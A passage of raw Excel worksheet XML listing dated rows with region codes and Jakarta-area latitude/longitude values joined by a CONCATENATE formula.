        <v>43886</v>
      </c>
      <c r="C1846">
        <v>1</v>
      </c>
      <c r="D1846" t="s">
        <v>22</v>
      </c>
      <c r="E1846" t="s">
        <v>23</v>
      </c>
      <c r="F1846" t="s">
        <v>6182</v>
      </c>
      <c r="G1846" t="s">
        <v>6183</v>
      </c>
      <c r="H1846" t="s">
        <v>26</v>
      </c>
      <c r="I1846" t="s">
        <v>929</v>
      </c>
      <c r="J1846" t="s">
        <v>1715</v>
      </c>
      <c r="L1846" t="s">
        <v>250</v>
      </c>
      <c r="M1846">
        <v>3175010005</v>
      </c>
      <c r="N1846">
        <v>3175010</v>
      </c>
      <c r="O1846">
        <v>3175</v>
      </c>
      <c r="P1846">
        <v>31</v>
      </c>
      <c r="Q1846" t="s">
        <v>1686</v>
      </c>
      <c r="R1846" t="s">
        <v>546</v>
      </c>
      <c r="S1846" t="s">
        <v>547</v>
      </c>
      <c r="T1846" t="s">
        <v>33</v>
      </c>
      <c r="U1846" s="5">
        <v>10677152</v>
      </c>
      <c r="V1846" s="5" t="s">
        <v>16095</v>
      </c>
      <c r="W1846" s="5">
        <v>-611178</v>
      </c>
      <c r="X1846" t="s">
        <v>19852</v>
      </c>
      <c r="Y1846" t="str">
        <f t="shared" si="28"/>
        <v>-6.11178,106.77152</v>
      </c>
    </row>
    <row r="1847" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1847">
        <v>143641</v>
      </c>
      <c r="B1847" s="1">
        <v>43886</v>
      </c>
      <c r="C1847">
        <v>1</v>
      </c>
      <c r="D1847" t="s">
        <v>22</v>
      </c>
      <c r="E1847" t="s">
        <v>23</v>
      </c>
      <c r="F1847" t="s">
        <v>6184</v>
      </c>
      <c r="G1847" t="s">
        <v>6185</v>
      </c>
      <c r="H1847" t="s">
        <v>26</v>
      </c>
      <c r="I1847" t="s">
        <v>166</v>
      </c>
      <c r="J1847" t="s">
        <v>2627</v>
      </c>
      <c r="L1847" t="s">
        <v>6186</v>
      </c>
      <c r="M1847">
        <v>3275040006</v>
      </c>
      <c r="N1847">
        <v>3275040</v>
      </c>
      <c r="O1847">
        <v>3275</v>
      </c>
      <c r="P1847">
        <v>32</v>
      </c>
      <c r="Q1847" t="s">
        <v>2185</v>
      </c>
      <c r="R1847" t="s">
        <v>100</v>
      </c>
      <c r="S1847" t="s">
        <v>41</v>
      </c>
      <c r="T1847" t="s">
        <v>42</v>
      </c>
      <c r="U1847" s="5">
        <v>10701390</v>
      </c>
      <c r="V1847" s="5" t="s">
        <v>16096</v>
      </c>
      <c r="W1847" s="5">
        <v>-623317</v>
      </c>
      <c r="X1847" t="s">
        <v>19853</v>
      </c>
      <c r="Y1847" t="str">
        <f t="shared" si="28"/>
        <v>-6.23317,107.01390</v>
      </c>
    </row>
    <row r="1848" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1848">
        <v>143945</v>
      </c>
      <c r="B1848" s="1">
        <v>43886</v>
      </c>
      <c r="C1848">
        <v>1</v>
      </c>
      <c r="D1848" t="s">
        <v>22</v>
      </c>
      <c r="E1848" t="s">
        <v>23</v>
      </c>
      <c r="F1848" t="s">
        <v>6187</v>
      </c>
      <c r="G1848" t="s">
        <v>6188</v>
      </c>
      <c r="H1848" t="s">
        <v>26</v>
      </c>
      <c r="I1848" t="s">
        <v>36</v>
      </c>
      <c r="J1848" t="s">
        <v>1100</v>
      </c>
      <c r="L1848" t="s">
        <v>6189</v>
      </c>
      <c r="M1848">
        <v>3172090007</v>
      </c>
      <c r="N1848">
        <v>3172090</v>
      </c>
      <c r="O1848">
        <v>3172</v>
      </c>
      <c r="P1848">
        <v>31</v>
      </c>
      <c r="Q1848" t="s">
        <v>890</v>
      </c>
      <c r="R1848" t="s">
        <v>890</v>
      </c>
      <c r="S1848" t="s">
        <v>49</v>
      </c>
      <c r="T1848" t="s">
        <v>33</v>
      </c>
      <c r="U1848" s="5">
        <v>10689671</v>
      </c>
      <c r="V1848" s="5" t="s">
        <v>16097</v>
      </c>
      <c r="W1848" s="5">
        <v>-618013</v>
      </c>
      <c r="X1848" t="s">
        <v>19854</v>
      </c>
      <c r="Y1848" t="str">
        <f t="shared" si="28"/>
        <v>-6.18013,106.89671</v>
      </c>
    </row>
    <row r="1849" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1849">
        <v>144152</v>
      </c>
      <c r="B1849" s="1">
        <v>43886</v>
      </c>
      <c r="C1849">
        <v>1</v>
      </c>
      <c r="D1849" t="s">
        <v>22</v>
      </c>
      <c r="E1849" t="s">
        <v>23</v>
      </c>
      <c r="F1849" t="s">
        <v>6190</v>
      </c>
      <c r="H1849" t="s">
        <v>26</v>
      </c>
      <c r="I1849" t="s">
        <v>65</v>
      </c>
      <c r="J1849" t="s">
        <v>3135</v>
      </c>
      <c r="L1849" t="s">
        <v>6191</v>
      </c>
      <c r="M1849">
        <v>3671041005</v>
      </c>
      <c r="N1849">
        <v>3671041</v>
      </c>
      <c r="O1849">
        <v>3671</v>
      </c>
      <c r="P1849">
        <v>36</v>
      </c>
      <c r="Q1849" t="s">
        <v>5523</v>
      </c>
      <c r="R1849" t="s">
        <v>3137</v>
      </c>
      <c r="S1849" t="s">
        <v>201</v>
      </c>
      <c r="T1849" t="s">
        <v>171</v>
      </c>
      <c r="U1849" s="5">
        <v>10659865</v>
      </c>
      <c r="V1849" s="5" t="s">
        <v>16098</v>
      </c>
      <c r="W1849" s="5">
        <v>-618873</v>
      </c>
      <c r="X1849" t="s">
        <v>19855</v>
      </c>
      <c r="Y1849" t="str">
        <f t="shared" si="28"/>
        <v>-6.18873,106.59865</v>
      </c>
    </row>
    <row r="1850" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1850">
        <v>144618</v>
      </c>
      <c r="B1850" s="1">
        <v>43887</v>
      </c>
      <c r="C1850">
        <v>0</v>
      </c>
      <c r="D1850" t="s">
        <v>22</v>
      </c>
      <c r="E1850" t="s">
        <v>23</v>
      </c>
      <c r="F1850" t="s">
        <v>6192</v>
      </c>
      <c r="H1850" t="s">
        <v>26</v>
      </c>
      <c r="I1850" t="s">
        <v>2395</v>
      </c>
      <c r="J1850" t="s">
        <v>793</v>
      </c>
      <c r="L1850" t="s">
        <v>6193</v>
      </c>
      <c r="M1850">
        <v>3175010002</v>
      </c>
      <c r="N1850">
        <v>3175010</v>
      </c>
      <c r="O1850">
        <v>3175</v>
      </c>
      <c r="P1850">
        <v>31</v>
      </c>
      <c r="Q1850" t="s">
        <v>616</v>
      </c>
      <c r="R1850" t="s">
        <v>546</v>
      </c>
      <c r="S1850" t="s">
        <v>547</v>
      </c>
      <c r="T1850" t="s">
        <v>33</v>
      </c>
      <c r="U1850" s="5">
        <v>10677423</v>
      </c>
      <c r="V1850" s="5" t="s">
        <v>16099</v>
      </c>
      <c r="W1850" s="5">
        <v>-613863</v>
      </c>
      <c r="X1850" t="s">
        <v>19856</v>
      </c>
      <c r="Y1850" t="str">
        <f t="shared" si="28"/>
        <v>-6.13863,106.77423</v>
      </c>
    </row>
    <row r="1851" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1851">
        <v>144685</v>
      </c>
      <c r="B1851" s="1">
        <v>43887</v>
      </c>
      <c r="C1851">
        <v>0</v>
      </c>
      <c r="D1851" t="s">
        <v>22</v>
      </c>
      <c r="E1851" t="s">
        <v>23</v>
      </c>
      <c r="F1851" t="s">
        <v>6194</v>
      </c>
      <c r="G1851" t="s">
        <v>6195</v>
      </c>
      <c r="H1851" t="s">
        <v>26</v>
      </c>
      <c r="I1851" t="s">
        <v>1194</v>
      </c>
      <c r="J1851" t="s">
        <v>846</v>
      </c>
      <c r="M1851">
        <v>3174070002</v>
      </c>
      <c r="N1851">
        <v>3174070</v>
      </c>
      <c r="O1851">
        <v>3174</v>
      </c>
      <c r="P1851">
        <v>31</v>
      </c>
      <c r="Q1851" t="s">
        <v>621</v>
      </c>
      <c r="R1851" t="s">
        <v>84</v>
      </c>
      <c r="S1851" t="s">
        <v>32</v>
      </c>
      <c r="T1851" t="s">
        <v>33</v>
      </c>
      <c r="U1851" s="5">
        <v>10674003</v>
      </c>
      <c r="V1851" s="5" t="s">
        <v>16100</v>
      </c>
      <c r="W1851" s="5">
        <v>-616627</v>
      </c>
      <c r="X1851" t="s">
        <v>19857</v>
      </c>
      <c r="Y1851" t="str">
        <f t="shared" si="28"/>
        <v>-6.16627,106.74003</v>
      </c>
    </row>
    <row r="1852" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1852">
        <v>144980</v>
      </c>
      <c r="B1852" s="1">
        <v>43887</v>
      </c>
      <c r="C1852">
        <v>0</v>
      </c>
      <c r="D1852" t="s">
        <v>22</v>
      </c>
      <c r="E1852" t="s">
        <v>23</v>
      </c>
      <c r="F1852" t="s">
        <v>6196</v>
      </c>
      <c r="G1852" t="s">
        <v>6197</v>
      </c>
      <c r="H1852" t="s">
        <v>26</v>
      </c>
      <c r="I1852" t="s">
        <v>27</v>
      </c>
      <c r="J1852" t="s">
        <v>5656</v>
      </c>
      <c r="L1852" t="s">
        <v>5657</v>
      </c>
      <c r="M1852">
        <v>3175060001</v>
      </c>
      <c r="N1852">
        <v>3175060</v>
      </c>
      <c r="O1852">
        <v>3175</v>
      </c>
      <c r="P1852">
        <v>31</v>
      </c>
      <c r="Q1852" t="s">
        <v>2278</v>
      </c>
      <c r="R1852" t="s">
        <v>2279</v>
      </c>
      <c r="S1852" t="s">
        <v>547</v>
      </c>
      <c r="T1852" t="s">
        <v>33</v>
      </c>
      <c r="U1852" s="5">
        <v>10692094</v>
      </c>
      <c r="V1852" s="5" t="s">
        <v>16101</v>
      </c>
      <c r="W1852" s="5">
        <v>-615762</v>
      </c>
      <c r="X1852" t="s">
        <v>19858</v>
      </c>
      <c r="Y1852" t="str">
        <f t="shared" si="28"/>
        <v>-6.15762,106.92094</v>
      </c>
    </row>
    <row r="1853" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1853">
        <v>145464</v>
      </c>
      <c r="B1853" s="1">
        <v>43887</v>
      </c>
      <c r="C1853">
        <v>0</v>
      </c>
      <c r="D1853" t="s">
        <v>2648</v>
      </c>
      <c r="E1853" t="s">
        <v>23</v>
      </c>
      <c r="G1853" t="s">
        <v>6198</v>
      </c>
      <c r="H1853" t="s">
        <v>26</v>
      </c>
      <c r="J1853" t="s">
        <v>3655</v>
      </c>
      <c r="L1853" t="s">
        <v>6199</v>
      </c>
      <c r="M1853">
        <v>3172080002</v>
      </c>
      <c r="N1853">
        <v>3172080</v>
      </c>
      <c r="O1853">
        <v>3172</v>
      </c>
      <c r="P1853">
        <v>31</v>
      </c>
      <c r="Q1853" t="s">
        <v>2804</v>
      </c>
      <c r="R1853" t="s">
        <v>141</v>
      </c>
      <c r="S1853" t="s">
        <v>49</v>
      </c>
      <c r="T1853" t="s">
        <v>33</v>
      </c>
      <c r="U1853" s="5">
        <v>10693887</v>
      </c>
      <c r="V1853" s="5" t="s">
        <v>16102</v>
      </c>
      <c r="W1853" s="5">
        <v>-619616</v>
      </c>
      <c r="X1853" t="s">
        <v>19859</v>
      </c>
      <c r="Y1853" t="str">
        <f t="shared" si="28"/>
        <v>-6.19616,106.93887</v>
      </c>
    </row>
    <row r="1854" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1854">
        <v>146160</v>
      </c>
      <c r="B1854" s="1">
        <v>43887</v>
      </c>
      <c r="C1854">
        <v>0</v>
      </c>
      <c r="D1854" t="s">
        <v>22</v>
      </c>
      <c r="E1854" t="s">
        <v>23</v>
      </c>
      <c r="F1854" t="s">
        <v>6200</v>
      </c>
      <c r="G1854" t="s">
        <v>6201</v>
      </c>
      <c r="H1854" t="s">
        <v>26</v>
      </c>
      <c r="I1854" t="s">
        <v>65</v>
      </c>
      <c r="J1854" t="s">
        <v>3066</v>
      </c>
      <c r="L1854" t="s">
        <v>6202</v>
      </c>
      <c r="M1854">
        <v>3173020001</v>
      </c>
      <c r="N1854">
        <v>3173020</v>
      </c>
      <c r="O1854">
        <v>3173</v>
      </c>
      <c r="P1854">
        <v>31</v>
      </c>
      <c r="Q1854" t="s">
        <v>179</v>
      </c>
      <c r="R1854" t="s">
        <v>179</v>
      </c>
      <c r="S1854" t="s">
        <v>62</v>
      </c>
      <c r="T1854" t="s">
        <v>33</v>
      </c>
      <c r="U1854" s="5">
        <v>10683517</v>
      </c>
      <c r="V1854" s="5" t="s">
        <v>15592</v>
      </c>
      <c r="W1854" s="5">
        <v>-619926</v>
      </c>
      <c r="X1854" t="s">
        <v>18957</v>
      </c>
      <c r="Y1854" t="str">
        <f t="shared" si="28"/>
        <v>-6.19926,106.83517</v>
      </c>
    </row>
    <row r="1855" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1855">
        <v>146405</v>
      </c>
      <c r="B1855" s="1">
        <v>43887</v>
      </c>
      <c r="C1855">
        <v>0</v>
      </c>
      <c r="D1855" t="s">
        <v>22</v>
      </c>
      <c r="E1855" t="s">
        <v>23</v>
      </c>
      <c r="F1855" t="s">
        <v>6203</v>
      </c>
      <c r="G1855" t="s">
        <v>6204</v>
      </c>
      <c r="H1855" t="s">
        <v>26</v>
      </c>
      <c r="I1855" t="s">
        <v>65</v>
      </c>
      <c r="J1855" t="s">
        <v>2438</v>
      </c>
      <c r="M1855">
        <v>3175050003</v>
      </c>
      <c r="N1855">
        <v>3175050</v>
      </c>
      <c r="O1855">
        <v>3175</v>
      </c>
      <c r="P1855">
        <v>31</v>
      </c>
      <c r="Q1855" t="s">
        <v>1740</v>
      </c>
      <c r="R1855" t="s">
        <v>1013</v>
      </c>
      <c r="S1855" t="s">
        <v>547</v>
      </c>
      <c r="T1855" t="s">
        <v>33</v>
      </c>
      <c r="U1855" s="5">
        <v>10691202</v>
      </c>
      <c r="V1855" s="5" t="s">
        <v>16103</v>
      </c>
      <c r="W1855" s="5">
        <v>-614838</v>
      </c>
      <c r="X1855" t="s">
        <v>19860</v>
      </c>
      <c r="Y1855" t="str">
        <f t="shared" si="28"/>
        <v>-6.14838,106.91202</v>
      </c>
    </row>
    <row r="1856" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1856">
        <v>146653</v>
      </c>
      <c r="B1856" s="1">
        <v>43887</v>
      </c>
      <c r="C1856">
        <v>0</v>
      </c>
      <c r="D1856" t="s">
        <v>22</v>
      </c>
      <c r="E1856" t="s">
        <v>23</v>
      </c>
      <c r="F1856" t="s">
        <v>6205</v>
      </c>
      <c r="H1856" t="s">
        <v>26</v>
      </c>
      <c r="I1856" t="s">
        <v>1891</v>
      </c>
      <c r="J1856" t="s">
        <v>2627</v>
      </c>
      <c r="L1856" t="s">
        <v>6206</v>
      </c>
      <c r="M1856">
        <v>3275060001</v>
      </c>
      <c r="N1856">
        <v>3275060</v>
      </c>
      <c r="O1856">
        <v>3275</v>
      </c>
      <c r="P1856">
        <v>32</v>
      </c>
      <c r="Q1856" t="s">
        <v>611</v>
      </c>
      <c r="R1856" t="s">
        <v>114</v>
      </c>
      <c r="S1856" t="s">
        <v>41</v>
      </c>
      <c r="T1856" t="s">
        <v>42</v>
      </c>
      <c r="U1856" s="5">
        <v>10695264</v>
      </c>
      <c r="V1856" s="5" t="s">
        <v>16104</v>
      </c>
      <c r="W1856" s="5">
        <v>-623088</v>
      </c>
      <c r="X1856" t="s">
        <v>19861</v>
      </c>
      <c r="Y1856" t="str">
        <f t="shared" si="28"/>
        <v>-6.23088,106.95264</v>
      </c>
    </row>
    <row r="1857" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1857">
        <v>147668</v>
      </c>
      <c r="B1857" s="1">
        <v>43887</v>
      </c>
      <c r="C1857">
        <v>0</v>
      </c>
      <c r="D1857" t="s">
        <v>22</v>
      </c>
      <c r="E1857" t="s">
        <v>23</v>
      </c>
      <c r="F1857" t="s">
        <v>6207</v>
      </c>
      <c r="G1857" t="s">
        <v>6208</v>
      </c>
      <c r="H1857" t="s">
        <v>26</v>
      </c>
      <c r="I1857" t="s">
        <v>27</v>
      </c>
      <c r="J1857" t="s">
        <v>2407</v>
      </c>
      <c r="L1857" t="s">
        <v>6209</v>
      </c>
      <c r="M1857">
        <v>3175060006</v>
      </c>
      <c r="N1857">
        <v>3175060</v>
      </c>
      <c r="O1857">
        <v>3175</v>
      </c>
      <c r="P1857">
        <v>31</v>
      </c>
      <c r="Q1857" t="s">
        <v>2409</v>
      </c>
      <c r="R1857" t="s">
        <v>2279</v>
      </c>
      <c r="S1857" t="s">
        <v>547</v>
      </c>
      <c r="T1857" t="s">
        <v>33</v>
      </c>
      <c r="U1857" s="5">
        <v>10692298</v>
      </c>
      <c r="V1857" s="5" t="s">
        <v>16105</v>
      </c>
      <c r="W1857" s="5">
        <v>-612850</v>
      </c>
      <c r="X1857" t="s">
        <v>19862</v>
      </c>
      <c r="Y1857" t="str">
        <f t="shared" si="28"/>
        <v>-6.12850,106.92298</v>
      </c>
    </row>
    <row r="1858" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1858">
        <v>147910</v>
      </c>
      <c r="B1858" s="1">
        <v>43887</v>
      </c>
      <c r="C1858">
        <v>0</v>
      </c>
      <c r="D1858" t="s">
        <v>2648</v>
      </c>
      <c r="E1858" t="s">
        <v>23</v>
      </c>
      <c r="G1858" t="s">
        <v>6210</v>
      </c>
      <c r="H1858" t="s">
        <v>26</v>
      </c>
      <c r="I1858" t="s">
        <v>6211</v>
      </c>
      <c r="J1858" t="s">
        <v>2657</v>
      </c>
      <c r="L1858" t="s">
        <v>6212</v>
      </c>
      <c r="M1858">
        <v>3172070003</v>
      </c>
      <c r="N1858">
        <v>3172070</v>
      </c>
      <c r="O1858">
        <v>3172</v>
      </c>
      <c r="P1858">
        <v>31</v>
      </c>
      <c r="Q1858" t="s">
        <v>2659</v>
      </c>
      <c r="R1858" t="s">
        <v>128</v>
      </c>
      <c r="S1858" t="s">
        <v>49</v>
      </c>
      <c r="T1858" t="s">
        <v>33</v>
      </c>
      <c r="U1858" s="5">
        <v>10693102</v>
      </c>
      <c r="V1858" s="5" t="s">
        <v>16106</v>
      </c>
      <c r="W1858" s="5">
        <v>-623912</v>
      </c>
      <c r="X1858" t="s">
        <v>18890</v>
      </c>
      <c r="Y1858" t="str">
        <f t="shared" si="28"/>
        <v>-6.23912,106.93102</v>
      </c>
    </row>
    <row r="1859" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1859">
        <v>148082</v>
      </c>
      <c r="B1859" s="1">
        <v>43887</v>
      </c>
      <c r="C1859">
        <v>0</v>
      </c>
      <c r="D1859" t="s">
        <v>2648</v>
      </c>
      <c r="E1859" t="s">
        <v>23</v>
      </c>
      <c r="G1859" t="s">
        <v>6213</v>
      </c>
      <c r="H1859" t="s">
        <v>26</v>
      </c>
      <c r="I1859" t="s">
        <v>710</v>
      </c>
      <c r="J1859" t="s">
        <v>6214</v>
      </c>
      <c r="L1859" t="s">
        <v>2794</v>
      </c>
      <c r="M1859">
        <v>3174010005</v>
      </c>
      <c r="N1859">
        <v>3174010</v>
      </c>
      <c r="O1859">
        <v>3174</v>
      </c>
      <c r="P1859">
        <v>31</v>
      </c>
      <c r="Q1859" t="s">
        <v>251</v>
      </c>
      <c r="R1859" t="s">
        <v>69</v>
      </c>
      <c r="S1859" t="s">
        <v>32</v>
      </c>
      <c r="T1859" t="s">
        <v>33</v>
      </c>
      <c r="U1859" s="5">
        <v>10673010</v>
      </c>
      <c r="V1859" s="5" t="s">
        <v>16107</v>
      </c>
      <c r="W1859" s="5">
        <v>-618543</v>
      </c>
      <c r="X1859" t="s">
        <v>19863</v>
      </c>
      <c r="Y1859" t="str">
        <f t="shared" ref="Y1859:Y1922" si="29">CONCATENATE(X1859,",",V1859)</f>
        <v>-6.18543,106.73010</v>
      </c>
    </row>
    <row r="1860" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1860">
        <v>148246</v>
      </c>
      <c r="B1860" s="1">
        <v>43887</v>
      </c>
      <c r="C1860">
        <v>0</v>
      </c>
      <c r="D1860" t="s">
        <v>22</v>
      </c>
      <c r="E1860" t="s">
        <v>23</v>
      </c>
      <c r="F1860" t="s">
        <v>6215</v>
      </c>
      <c r="G1860" t="s">
        <v>6216</v>
      </c>
      <c r="H1860" t="s">
        <v>26</v>
      </c>
      <c r="I1860" t="s">
        <v>1046</v>
      </c>
      <c r="J1860" t="s">
        <v>3135</v>
      </c>
      <c r="L1860" t="s">
        <v>6217</v>
      </c>
      <c r="M1860">
        <v>3603120007</v>
      </c>
      <c r="N1860">
        <v>3603120</v>
      </c>
      <c r="O1860">
        <v>3603</v>
      </c>
      <c r="P1860">
        <v>36</v>
      </c>
      <c r="Q1860" t="s">
        <v>6218</v>
      </c>
      <c r="R1860" t="s">
        <v>6219</v>
      </c>
      <c r="S1860" t="s">
        <v>201</v>
      </c>
      <c r="T1860" t="s">
        <v>171</v>
      </c>
      <c r="U1860" s="5">
        <v>10657754</v>
      </c>
      <c r="V1860" s="5" t="s">
        <v>16108</v>
      </c>
      <c r="W1860" s="5">
        <v>-616553</v>
      </c>
      <c r="X1860" t="s">
        <v>19864</v>
      </c>
      <c r="Y1860" t="str">
        <f t="shared" si="29"/>
        <v>-6.16553,106.57754</v>
      </c>
    </row>
    <row r="1861" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1861">
        <v>149040</v>
      </c>
      <c r="B1861" s="1">
        <v>43887</v>
      </c>
      <c r="C1861">
        <v>0</v>
      </c>
      <c r="D1861" t="s">
        <v>22</v>
      </c>
      <c r="E1861" t="s">
        <v>23</v>
      </c>
      <c r="F1861" t="s">
        <v>6220</v>
      </c>
      <c r="G1861" t="s">
        <v>6221</v>
      </c>
      <c r="H1861" t="s">
        <v>26</v>
      </c>
      <c r="I1861" t="s">
        <v>6222</v>
      </c>
      <c r="J1861" t="s">
        <v>6223</v>
      </c>
      <c r="M1861">
        <v>3172070003</v>
      </c>
      <c r="N1861">
        <v>3172070</v>
      </c>
      <c r="O1861">
        <v>3172</v>
      </c>
      <c r="P1861">
        <v>31</v>
      </c>
      <c r="Q1861" t="s">
        <v>2659</v>
      </c>
      <c r="R1861" t="s">
        <v>128</v>
      </c>
      <c r="S1861" t="s">
        <v>49</v>
      </c>
      <c r="T1861" t="s">
        <v>33</v>
      </c>
      <c r="U1861" s="5">
        <v>10694263</v>
      </c>
      <c r="V1861" s="5" t="s">
        <v>16109</v>
      </c>
      <c r="W1861" s="5">
        <v>-624376</v>
      </c>
      <c r="X1861" t="s">
        <v>19865</v>
      </c>
      <c r="Y1861" t="str">
        <f t="shared" si="29"/>
        <v>-6.24376,106.94263</v>
      </c>
    </row>
    <row r="1862" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1862">
        <v>149041</v>
      </c>
      <c r="B1862" s="1">
        <v>43887</v>
      </c>
      <c r="C1862">
        <v>0</v>
      </c>
      <c r="D1862" t="s">
        <v>22</v>
      </c>
      <c r="E1862" t="s">
        <v>23</v>
      </c>
      <c r="F1862" t="s">
        <v>6224</v>
      </c>
      <c r="G1862" t="s">
        <v>6225</v>
      </c>
      <c r="H1862" t="s">
        <v>26</v>
      </c>
      <c r="I1862" t="s">
        <v>555</v>
      </c>
      <c r="J1862" t="s">
        <v>3135</v>
      </c>
      <c r="M1862">
        <v>3603120007</v>
      </c>
      <c r="N1862">
        <v>3603120</v>
      </c>
      <c r="O1862">
        <v>3603</v>
      </c>
      <c r="P1862">
        <v>36</v>
      </c>
      <c r="Q1862" t="s">
        <v>6218</v>
      </c>
      <c r="R1862" t="s">
        <v>6219</v>
      </c>
      <c r="S1862" t="s">
        <v>201</v>
      </c>
      <c r="T1862" t="s">
        <v>171</v>
      </c>
      <c r="U1862" s="5">
        <v>10657727</v>
      </c>
      <c r="V1862" s="5" t="s">
        <v>16110</v>
      </c>
      <c r="W1862" s="5">
        <v>-617055</v>
      </c>
      <c r="X1862" t="s">
        <v>19866</v>
      </c>
      <c r="Y1862" t="str">
        <f t="shared" si="29"/>
        <v>-6.17055,106.57727</v>
      </c>
    </row>
    <row r="1863" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1863">
        <v>149400</v>
      </c>
      <c r="B1863" s="1">
        <v>43887</v>
      </c>
      <c r="C1863">
        <v>0</v>
      </c>
      <c r="D1863" t="s">
        <v>22</v>
      </c>
      <c r="E1863" t="s">
        <v>23</v>
      </c>
      <c r="F1863" t="s">
        <v>6226</v>
      </c>
      <c r="G1863" t="s">
        <v>6227</v>
      </c>
      <c r="H1863" t="s">
        <v>26</v>
      </c>
      <c r="I1863" t="s">
        <v>784</v>
      </c>
      <c r="J1863" t="s">
        <v>2608</v>
      </c>
      <c r="L1863" t="s">
        <v>6228</v>
      </c>
      <c r="M1863">
        <v>3311120004</v>
      </c>
      <c r="N1863">
        <v>3311120</v>
      </c>
      <c r="O1863">
        <v>3311</v>
      </c>
      <c r="P1863">
        <v>33</v>
      </c>
      <c r="Q1863" t="s">
        <v>6229</v>
      </c>
      <c r="R1863" t="s">
        <v>6230</v>
      </c>
      <c r="S1863" t="s">
        <v>6231</v>
      </c>
      <c r="T1863" t="s">
        <v>1134</v>
      </c>
      <c r="U1863" s="5">
        <v>11076899</v>
      </c>
      <c r="V1863" s="5" t="s">
        <v>16111</v>
      </c>
      <c r="W1863" s="5">
        <v>-755879</v>
      </c>
      <c r="X1863" t="s">
        <v>19867</v>
      </c>
      <c r="Y1863" t="str">
        <f t="shared" si="29"/>
        <v>-7.55879,110.76899</v>
      </c>
    </row>
    <row r="1864" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1864">
        <v>150477</v>
      </c>
      <c r="B1864" s="1">
        <v>43887</v>
      </c>
      <c r="C1864">
        <v>0</v>
      </c>
      <c r="D1864" t="s">
        <v>22</v>
      </c>
      <c r="E1864" t="s">
        <v>23</v>
      </c>
      <c r="F1864" t="s">
        <v>6232</v>
      </c>
      <c r="H1864" t="s">
        <v>26</v>
      </c>
      <c r="I1864" t="s">
        <v>193</v>
      </c>
      <c r="J1864" t="s">
        <v>2627</v>
      </c>
      <c r="L1864" t="s">
        <v>5284</v>
      </c>
      <c r="M1864">
        <v>3216070013</v>
      </c>
      <c r="N1864">
        <v>3216070</v>
      </c>
      <c r="O1864">
        <v>3216</v>
      </c>
      <c r="P1864">
        <v>32</v>
      </c>
      <c r="Q1864" t="s">
        <v>5527</v>
      </c>
      <c r="R1864" t="s">
        <v>5479</v>
      </c>
      <c r="S1864" t="s">
        <v>41</v>
      </c>
      <c r="T1864" t="s">
        <v>42</v>
      </c>
      <c r="U1864" s="5">
        <v>10708120</v>
      </c>
      <c r="V1864" s="5" t="s">
        <v>16112</v>
      </c>
      <c r="W1864" s="5">
        <v>-624810</v>
      </c>
      <c r="X1864" t="s">
        <v>19868</v>
      </c>
      <c r="Y1864" t="str">
        <f t="shared" si="29"/>
        <v>-6.24810,107.08120</v>
      </c>
    </row>
    <row r="1865" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1865">
        <v>151615</v>
      </c>
      <c r="B1865" s="1">
        <v>43887</v>
      </c>
      <c r="C1865">
        <v>0</v>
      </c>
      <c r="D1865" t="s">
        <v>22</v>
      </c>
      <c r="E1865" t="s">
        <v>23</v>
      </c>
      <c r="F1865" t="s">
        <v>6233</v>
      </c>
      <c r="G1865" t="s">
        <v>6234</v>
      </c>
      <c r="H1865" t="s">
        <v>26</v>
      </c>
      <c r="I1865" t="s">
        <v>6235</v>
      </c>
      <c r="J1865" t="s">
        <v>2627</v>
      </c>
      <c r="L1865" t="s">
        <v>6236</v>
      </c>
      <c r="M1865">
        <v>3216081001</v>
      </c>
      <c r="N1865">
        <v>3216081</v>
      </c>
      <c r="O1865">
        <v>3216</v>
      </c>
      <c r="P1865">
        <v>32</v>
      </c>
      <c r="Q1865" t="s">
        <v>1726</v>
      </c>
      <c r="R1865" t="s">
        <v>2512</v>
      </c>
      <c r="S1865" t="s">
        <v>41</v>
      </c>
      <c r="T1865" t="s">
        <v>42</v>
      </c>
      <c r="U1865" s="5">
        <v>10702155</v>
      </c>
      <c r="V1865" s="5" t="s">
        <v>16113</v>
      </c>
      <c r="W1865" s="5">
        <v>-626576</v>
      </c>
      <c r="X1865" t="s">
        <v>19869</v>
      </c>
      <c r="Y1865" t="str">
        <f t="shared" si="29"/>
        <v>-6.26576,107.02155</v>
      </c>
    </row>
    <row r="1866" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1866">
        <v>151616</v>
      </c>
      <c r="B1866" s="1">
        <v>43887</v>
      </c>
      <c r="C1866">
        <v>0</v>
      </c>
      <c r="D1866" t="s">
        <v>22</v>
      </c>
      <c r="E1866" t="s">
        <v>23</v>
      </c>
      <c r="F1866" t="s">
        <v>6237</v>
      </c>
      <c r="G1866" t="s">
        <v>6238</v>
      </c>
      <c r="H1866" t="s">
        <v>26</v>
      </c>
      <c r="I1866" t="s">
        <v>6239</v>
      </c>
      <c r="J1866" t="s">
        <v>667</v>
      </c>
      <c r="L1866" t="s">
        <v>6240</v>
      </c>
      <c r="M1866">
        <v>3175010003</v>
      </c>
      <c r="N1866">
        <v>3175010</v>
      </c>
      <c r="O1866">
        <v>3175</v>
      </c>
      <c r="P1866">
        <v>31</v>
      </c>
      <c r="Q1866" t="s">
        <v>545</v>
      </c>
      <c r="R1866" t="s">
        <v>546</v>
      </c>
      <c r="S1866" t="s">
        <v>547</v>
      </c>
      <c r="T1866" t="s">
        <v>33</v>
      </c>
      <c r="U1866" s="5">
        <v>10677794</v>
      </c>
      <c r="V1866" s="5" t="s">
        <v>16114</v>
      </c>
      <c r="W1866" s="5">
        <v>-613141</v>
      </c>
      <c r="X1866" t="s">
        <v>19870</v>
      </c>
      <c r="Y1866" t="str">
        <f t="shared" si="29"/>
